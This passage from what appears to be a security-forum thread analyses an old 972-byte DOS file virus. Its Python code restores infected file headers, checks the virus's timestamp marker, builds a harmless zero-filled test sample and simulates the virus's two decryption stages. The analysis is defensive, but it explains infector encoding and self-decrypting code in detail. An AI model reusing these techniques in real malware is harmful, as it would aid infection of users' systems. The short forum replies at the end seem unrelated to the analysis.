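    body = data[-VIRUS_LENGTH:]
    stored_byte = body[-4]                                 # [di-3]
    stored_word = int.from_bytes(body[-3:-1], "little")    # [di-2]
    head = bytearray(data[:3])
    head[0] ^= stored_byte ^ HEAD_BYTE_KEY
    w = int.from_bytes(head[1:3], "little") ^ stored_word ^ HEAD_WORD_KEY
    head[1:3] = w.to_bytes(2, "little")
    return bytes(head) + data[3:len(data) - VIRUS_LENGTH]


def mark_dos_time(t: int) -> int:
    """The marker written at 05E2/05E5: OR 1Eh, AND FFFEh on the DOS time word."""
    return (t | 0x1E) & 0xFFFE


def has_dos_time_marker(t: int) -> bool:
    """The check at 04F6/04F8. The 2-second field (bits 0-4) reads 1Eh = 60 s,
    a value no legitimate FAT timestamp carries, so it doubles as a scan heuristic."""
    return (t & 0x1E) == 0x1E


def make_sample_infected(original: bytes) -> bytes:
    """Constructed fixture with the layout the listing describes: the first three
    host bytes replaced by E9h + rel16 (host length + 36h), the host remainder,
    then 972 bytes whose last four are the encoded header copy and E9h.
    Everything between the marker string and the tail is zero filler, not code."""
    rel16 = (len(original) + 0x36) & 0xFFFF
    stored_byte = original[0] ^ STORE_BYTE_KEY
    stored_word = int.from_bytes(original[1:3], "little") ^ rel16 ^ HEAD_WORD_KEY
    tail = bytes([stored_byte]) + stored_word.to_bytes(2, "little") + b"\xE9"
    body = b"BlueMood[Harmless]".ljust(VIRUS_LENGTH - len(tail), b"\x00") + tail
    assert len(body) == VIRUS_LENGTH
    return b"\xE9" + rel16.to_bytes(2, "little") + original[3:] + body


# Constructed 64-byte "host": MOV AH,4C / INT 21 followed by padding.
SAMPLE_HOST = bytes([0xB4, 0x4C, 0xCD, 0x21]) + b"\x00" * 60

if __name__ == "__main__":
    sample = make_sample_infected(SAMPLE_HOST)
    print("infected:", is_infected(sample), "restored ok:", disinfect(sample) == SAMPLE_HOST)
```

Like Kill972, `is_infected` keys on a fixed string and a fixed trailing byte, so it finds this specimen and nothing else; the point of the example is the arithmetic of the repair, which has to match the infector's encoding bit for bit.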
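The "reverse instruction flow" note at 3DA is worth checking against the dumps, because the trick is simpler than it looks: each pass pushes the raw word onto the stack, so fourteen words read forward from 3DA land at FFDC..FFF7 in reverse word order, and that stack image is byte for byte the decryptor the dump shows executing after JMP SP; the XOR with CX and the moving SP only serves to overwrite the loop's own LODSW/PUSH AX with JMP 0400 on the fifteenth pass. The Python below is an added analysis example, not code from the thread: it simulates those passes on the data words copied from the listing and the register values from the dumps, and models the second-stage keystream that XOR AL,CL inside LOOP produces. All constants come from the listing; nothing else is assumed.

```python
# Added example: simulation of the two decoding stages annotated in the listing,
# used to confirm the reading of them. Data and registers are copied from the dumps.

DATA_3DA = bytes.fromhex("C342E2FAC1AAAC328BFEB90281EE8BF3"
                         "0390B9000251E9B900818B4E")      # 14 words at 3DA..3F5
LOOP_HEAD = bytes.fromhex("AD50")                          # LODSW / PUSH AX at 3F6
CX_KEY = 0xA79C                                            # MOV CX,A79C at 3BA
SP_START = 0xFFF8                                          # SP when the loop starts
DECRYPTOR_AT_FFDC = bytes.fromhex(                         # FFDC..FFF7 per the dump
    "8B4E0081E9B90251B90003908BF381EEB9028BFEAC32C1AAE2FAC342")


def simulate_reverse_flow(stream: bytes = DATA_3DA + LOOP_HEAD,
                          cx: int = CX_KEY, sp: int = SP_START):
    """One pass per word: LODSW; PUSH AX (raw word to a downward stack);
    XOR AX,CX; XOR AX,SP; STOSW (word rewritten in place).
    Returns (final SP, stack bytes from SP to SP_START, rewritten words)."""
    stack = {}
    rewritten = bytearray()
    for i in range(0, len(stream), 2):
        raw = int.from_bytes(stream[i:i + 2], "little")
        sp -= 2                                   # PUSH AX
        stack[sp], stack[sp + 1] = stream[i], stream[i + 1]
        rewritten += ((raw ^ cx ^ sp) & 0xFFFF).to_bytes(2, "little")
    image = bytes(stack[a] for a in range(sp, SP_START))
    return sp, image, bytes(rewritten)


def stage2_keystream(n: int = 0x300) -> bytes:
    """XOR AL,CL inside LOOP with CX=0300h: CL is 00 on the first byte,
    then FF, FE, ... because LOOP decrements CX after each byte."""
    return bytes((-i) & 0xFF for i in range(n))


def stage2_xor(buf: bytes) -> bytes:
    """The FFF0..FFF4 loop over DS:0403-0703; XOR is its own inverse."""
    return bytes(b ^ k for b, k in zip(buf, stage2_keystream(len(buf))))


if __name__ == "__main__":
    final_sp, image, rewritten = simulate_reverse_flow()
    print(hex(final_sp), image[2:] == DECRYPTOR_AT_FFDC, rewritten[-2:].hex())
```

After the fifteenth push SP is FFDAh, POP AX lifts it to FFDCh, and the image from there upward is the MOV CX,[BP+00] ... RET sequence in the dump; the last rewritten word is EB08h, the JMP 0400 the annotation at 3F6 predicts. The second stage is plain XOR with a counting key, so running `stage2_xor` twice returns the input.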
Reply: tommy_he [tommy_he] Moderator
Basically every site has some! Go take a look!
Floor 2, posted: 08/20 15:18

Reply: yuntian108 [yuntian108] Forum user
Thanks
Floor 3, posted: 08/20 17:22
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.